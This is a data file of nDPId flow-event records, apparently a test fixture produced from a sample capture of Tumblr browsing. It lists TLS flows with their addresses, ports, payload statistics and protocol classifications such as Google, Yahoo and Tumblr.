-00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605292105433,"flow_last_seen":1605292106000,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7251,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"}} -00680{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605292121674,"flow_last_seen":1605292122517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605292121674,"flow_last_seen":1605292122517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49462,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49462,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49464,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49464,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605292122064,"flow_last_seen":1605292122440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6040,"flow_tot_l4_payload_len":76219,"flow_avg_l4_payload_len":712,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605292104650,"flow_last_seen":1605292122733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605292104650,"flow_last_seen":1605292122733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":21017,"flow_first_seen":1605292105669,"flow_last_seen":1605292122890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2772,"flow_tot_l4_payload_len":20045142,"flow_avg_l4_payload_len":953,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1671,"flow_first_seen":1605292108895,"flow_last_seen":1605292115212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2426,"flow_tot_l4_payload_len":1035742,"flow_avg_l4_payload_len":619,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1605292103810,"flow_last_seen":1605292122755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2294,"flow_tot_l4_payload_len":522833,"flow_avg_l4_payload_len":606,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605292105197,"flow_last_seen":1605292105378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":19710,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1605292105274,"flow_last_seen":1605292105347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605292105418,"flow_last_seen":1605292122864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1279,"flow_tot_l4_payload_len":9163,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} 